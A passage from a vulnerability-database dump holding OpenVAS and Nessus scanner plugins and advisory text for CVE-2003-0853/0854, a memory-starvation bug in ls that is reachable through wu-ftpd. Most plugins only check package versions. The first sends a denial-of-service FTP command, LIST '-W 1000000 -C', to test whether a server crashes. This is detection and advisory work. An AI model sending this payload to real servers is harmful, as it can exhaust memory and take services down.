value:\"http://www.guninski.com/binls.html\");\n script_xref(name:\"CONECTIVA\", value:\"CLA-2003:768\");\n script_xref(name:\"zone-h\", value:\"3299\");\n\n script_tag(name:\"summary\", value:\"The FTP server does not filter arguments to the ls command.\");\n\n script_tag(name:\"insight\", value:\"It is possible to consume all available memory on the machine\n by sending\n\n ls '-w 1000000 -C'\");\n\n script_tag(name:\"solution\", value:\"Contact your vendor for a fix.\");\n\n script_tag(name:\"qod_type\", value:\"remote_probe\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nkb_creds = ftp_get_kb_creds();\nuser = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\nif( ! ftp_authenticate( socket:soc, user:user, pass:pass ) ) exit( 0 );\n\nport2 = ftp_pasv( socket:soc );\nif( ! port2 ) {\n ftp_close( socket:soc );\n exit( 0 );\n}\n\nsoc2 = open_sock_tcp( port2, transport:ENCAPS_IP );\n\nif( ! soc2 ) {\n send( socket:soc, data:'LIST -ABCDEFGHIJKLMNOPQRSTUV\\r\\n' );\n r1 = ftp_recv_line( socket:soc );\n\n if( egrep( string:r1, pattern:\"invalid option|usage:\", icase:TRUE ) )\n security_message( port:port );\n\n if( soc2 ) close( soc2 );\n ftp_close( socket:soc );\n exit( 0 );\n}\n\nif( safe_checks() ) exit( 0 );\n\nstart_denial();\n\nsend( socket:soc, data:'LIST \"-W 1000000 -C\"\\r\\n' );\nr1 = ftp_recv_line( socket:soc );\nl = ftp_recv_listing( socket:soc2 );\nr2 = ftp_recv_line( socket:soc );\nclose( soc2 );\nftp_close( socket:soc );\n\nalive = end_denial();\nif( ! alive ) {\n security_message( port:port );\n exit( 0 );\n}\n\nif( egrep( string:r2, pattern:\"exhausted|failed\", icase:TRUE ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nsoc = open_sock_tcp( port );\nif( ! soc || ! ftp_authenticate( socket:soc, user:user, pass:pass ) )\n security_message( port:port );\n\nif( soc ) ftp_close( socket:soc );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:50:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0256", "CVE-2003-0854"], "description": "The remote host is missing an update to wu-ftpd\nannounced via advisory DSA 705-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53532", "href": "http://plugins.openvas.org/nasl.php?oid=53532", "type": "openvas", "title": "Debian Security Advisory DSA 705-1 (wu-ftpd)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_705_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 705-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several denial of service conditions have been discovered in wu-ftpd,\nthe popular FTP daemon. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2005-0256\n\nAdam Zabrocki discovered a denial of service condition in wu-ftpd\nthat could be exploited by a remote user and cause the server to\nslow down the server by resource exhaustion.\n\nCVE-2003-0854\n\nGeorgi Guninski discovered that /bin/ls may be called from within\nwu-ftpd in a way that will result in large memory consumption and\nhence slow down the server.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.6.2-3woody5.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 2.6.2-19.\n\nWe recommend that you upgrade your wu-ftpd package.\";\ntag_summary = \"The remote host is missing an update to wu-ftpd\nannounced via advisory DSA 705-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20705-1\";\n\nif(description)\n{\n script_id(53532);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-0256\", \"CVE-2003-0854\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 705-1 (wu-ftpd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wu-ftpd-academ\", ver:\"2.6.2-3woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wu-ftpd\", ver:\"2.6.2-3woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T11:51:20", "description": "A memory starvation denial of service vulnerability in the ls program\nwas discovered by Georgi Guninski. It is possible to allocate a huge\namount of memory by specifying certain command-line arguments. It is\nalso possible to exploit this remotely via programs that call ls such\nas wu-ftpd (although wu-ftpd is no longer shipped with Mandrake\nLinux).\n\nLikewise, a non-exploitable integer overflow problem was discovered in\nls, which can be used to crash ls by specifying certain command-line\narguments. This can also be triggered via remotely accessible services\nsuch as wu-ftpd.\n\nThe provided packages include a patched ls to fix these problems.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : fileutils/coreutils (MDKSA-2003:106)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:fileutils", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:coreutils", "cpe:/o:mandrakesoft:mandrake_linux:9.0", "p-cpe:/a:mandriva:linux:coreutils-doc"], "id": "MANDRAKE_MDKSA-2003-106.NASL", "href": "https://www.tenable.com/plugins/nessus/14088", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:106. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14088);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_xref(name:\"MDKSA\", value:\"2003:106\");\n\n script_name(english:\"Mandrake Linux Security Advisory : fileutils/coreutils (MDKSA-2003:106)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A memory starvation denial of service vulnerability in the ls program\nwas discovered by Georgi Guninski. It is possible to allocate a huge\namount of memory by specifying certain command-line arguments. It is\nalso possible to exploit this remotely via programs that call ls such\nas wu-ftpd (although wu-ftpd is no longer shipped with Mandrake\nLinux).\n\nLikewise, a non-exploitable integer overflow problem was discovered in\nls, which can be used to crash ls by specifying certain command-line\narguments. This can also be triggered via remotely accessible services\nsuch as wu-ftpd.\n\nThe provided packages include a patched ls to fix these problems.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected coreutils, coreutils-doc and / or fileutils\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:coreutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:coreutils-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:fileutils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"fileutils-4.1.11-6.1.90mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"coreutils-4.5.7-1.1.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"coreutils-doc-4.5.7-1.1.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"coreutils-5.0-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"coreutils-5.0-6.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"coreutils-doc-5.0-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"coreutils-doc-5.0-6.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:05:17", "description": "Updated fileutils packages that close a potential denial of service\nvulnerability are now available.\n\nThe fileutils package contains several basic system utilities. One of\nthese utilities is the 'ls' program, which is used to list information\nabout files and directories.\n\nGeorgi Guninski discovered a memory starvation denial of service\nvulnerability in the ls program. It is possible to make ls allocate a\nhuge amount of memory by specifying certain command line arguments.\nThis vulnerability is remotely exploitable through services like\nwu-ftpd, which pass user arguments to ls. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the name\nCVE-2003-0854 to this issue.\n\nA non-exploitable integer overflow in ls has been discovered. It is\npossible to make ls crash by specifying certain command line\narguments. This vulnerability is remotely exploitable through services\nlike wu-ftpd, which pass user arguments to ls. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2003-0853 to this issue.\n\nUsers are advised to update to these erratum packages, which contain\nbackported security patches that correct these vulnerabilities.\n\nThese packages also add support for the O_DIRECT flag, which controls\nthe use of synchronous I/O on file systems such as OCFS.", "edition": 28, "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 : fileutils (RHSA-2003:310)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:fileutils"], "id": "REDHAT-RHSA-2003-310.NASL", "href": "https://www.tenable.com/plugins/nessus/12428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:310. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12428);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_xref(name:\"RHSA\", value:\"2003:310\");\n\n script_name(english:\"RHEL 2.1 : fileutils (RHSA-2003:310)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated fileutils packages that close a potential denial of service\nvulnerability are now available.\n\nThe fileutils package contains several basic system utilities. One of\nthese utilities is the 'ls' program, which is used to list information\nabout files and directories.\n\nGeorgi Guninski discovered a memory starvation denial of service\nvulnerability in the ls program. It is possible to make ls allocate a\nhuge amount of memory by specifying certain command line arguments.\nThis vulnerability is remotely exploitable through services like\nwu-ftpd, which pass user arguments to ls. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the name\nCVE-2003-0854 to this issue.\n\nA non-exploitable integer overflow in ls has been discovered. It is\npossible to make ls crash by specifying certain command line\narguments. This vulnerability is remotely exploitable through services\nlike wu-ftpd, which pass user arguments to ls. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2003-0853 to this issue.\n\nUsers are advised to update to these erratum packages, which contain\nbackported security patches that correct these vulnerabilities.\n\nThese packages also add support for the O_DIRECT flag, which controls\nthe use of synchronous I/O on file systems such as OCFS.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0853\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0854\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:310\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected fileutils package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:fileutils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/11/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:310\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"fileutils-4.1-10.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"fileutils\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:05:41", "description": "An updated coreutils package is available fixing an issue in the ls(1)\nutility, described at :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0853\n\nNote that this vulnerability affects Internet-facing services which\nexecute ls(1) with user-supplied input, and although wu-ftpd is one\nsuch service it is not supplied with Fedora Core 1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2012-09-24T00:00:00", "title": "Fedora Core 1 : coreutils-5.0-34.1 (2004-091)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853"], "modified": "2012-09-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:coreutils-debuginfo", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:coreutils"], "id": "FEDORA_2004-091.NASL", "href": "https://www.tenable.com/plugins/nessus/62243", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-091.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62243);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0853\");\n script_xref(name:\"FEDORA\", value:\"2004-091\");\n\n script_name(english:\"Fedora Core 1 : coreutils-5.0-34.1 (2004-091)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated coreutils package is available fixing an issue in the ls(1)\nutility, described at :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0853\n\nNote that this vulnerability affects Internet-facing services which\nexecute ls(1) with user-supplied input, and although wu-ftpd is one\nsuch service it is not supplied with Fedora Core 1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-March/000089.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7ad7dd42\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected coreutils and / or coreutils-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:coreutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:coreutils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"coreutils-5.0-34.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"coreutils-debuginfo-5.0-34.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"coreutils / coreutils-debuginfo\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T10:03:18", "description": "Several denial of service conditions have been discovered in wu-ftpd,\nthe popular FTP daemon. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CAN-2005-0256\n Adam Zabrocki discovered a denial of service condition\n in wu-ftpd that could be exploited by a remote user and\n cause the server to slow down by resource exhaustion.\n\n - CAN-2003-0854\n\n Georgi Guninski discovered that /bin/ls may be called\n from within wu-ftpd in a way that will result in large\n memory consumption and hence slow down the server.", "edition": 25, "published": "2005-04-11T00:00:00", "title": "Debian DSA-705-1 : wu-ftpd - missing input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0256", "CVE-2003-0854"], "modified": "2005-04-11T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:wu-ftpd"], "id": "DEBIAN_DSA-705.NASL", "href": "https://www.tenable.com/plugins/nessus/18010", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-705. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18010);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0854\", \"CVE-2005-0256\");\n script_xref(name:\"DSA\", value:\"705\");\n\n script_name(english:\"Debian DSA-705-1 : wu-ftpd - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several denial of service conditions have been discovered in wu-ftpd,\nthe popular FTP daemon. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CAN-2005-0256\n Adam Zabrocki discovered a denial of service condition\n in wu-ftpd that could be exploited by a remote user and\n cause the server to slow down by resource exhaustion.\n\n - CAN-2003-0854\n\n Georgi Guninski discovered that /bin/ls may be called\n from within wu-ftpd in a way that will result in large\n memory consumption and hence slow down the server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-705\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wu-ftpd package.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.6.2-3woody5.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wu-ftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/11\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"wu-ftpd\", reference:\"2.6.2-3woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"wu-ftpd-academ\", reference:\"2.6.2-3woody5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osvdb": [{"lastseen": 